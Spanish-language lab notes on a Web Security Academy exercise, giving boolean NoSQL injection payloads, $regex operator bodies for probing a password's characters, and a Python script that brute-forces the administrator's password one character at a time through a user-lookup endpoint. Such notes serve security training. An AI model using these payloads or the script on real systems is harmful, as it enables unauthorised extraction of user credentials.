3 - Exploiting NoSQL injection to extract data

Responde a booleans :

administrator'+%26%26+1+%26%26+'x

' && this.password[0] == 'a' || 'a'=='b
' && this.password.match(/\d/) || 'a'=='b //La pass tiene números
' && this.password.match(/[a-z]/) || 'a'=='b //La pass tiene minúsculas

La pass tiene números

{
  "username": "carlos",
  "password": {
    "$regex": ".*\\d.*" 
  }
}

Tiene minúsculas

{
  "username": "carlos",
  "password": {
    "$regex": ".*[a-z].*"
  }
}

Ir iterando sobre la contraseña :

GET /user/lookup?user=wiener' && this.password[0] == 'a' || 'a'=='b

#!/usr/bin/env python3

from pwn import *
import requests, sys, signal, time, pdb, urllib3,string
from urllib.parse import quote

def sig_handler(sig, frame):
    print("\n\n[!] Saliendo...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, sig_handler)

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

cookie = { "Cookie" : "session=Ja7NDzdq3qDkdLa1fmYN9SwjSFHVLJoS"}

#Variables Globales
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'

def makeSQLI():
	s=requests.session()
	s.verify = False
    

	p1= log.progress("Fuerza Bruta")
	p1.status("Iniciando proceso de fuerza bruta")

	time.sleep(2)

	p2= log.progress("Password")

	password= ""
	for position in range(0,50): #Rango 1 - (tamaño database + 1)
		for character in characters:
			payload= f"administrator'+%26%26+this.password[{position}]+%3d%3d+'{character}'+||+'a'%3d%3d'b"
			url= f"https://0add009203f6b951805d30b700b8009d.web-security-academy.net/user/lookup?user={payload}"
			p1.status(payload)
			#url = quote(url, safe=':/?&=.,')
			r = s.get(url, verify=False, headers=cookie)
			if "role" in r.text :
				password += character
				p2.status(password)
				break

if __name__ == '__main__':
	makeSQLI()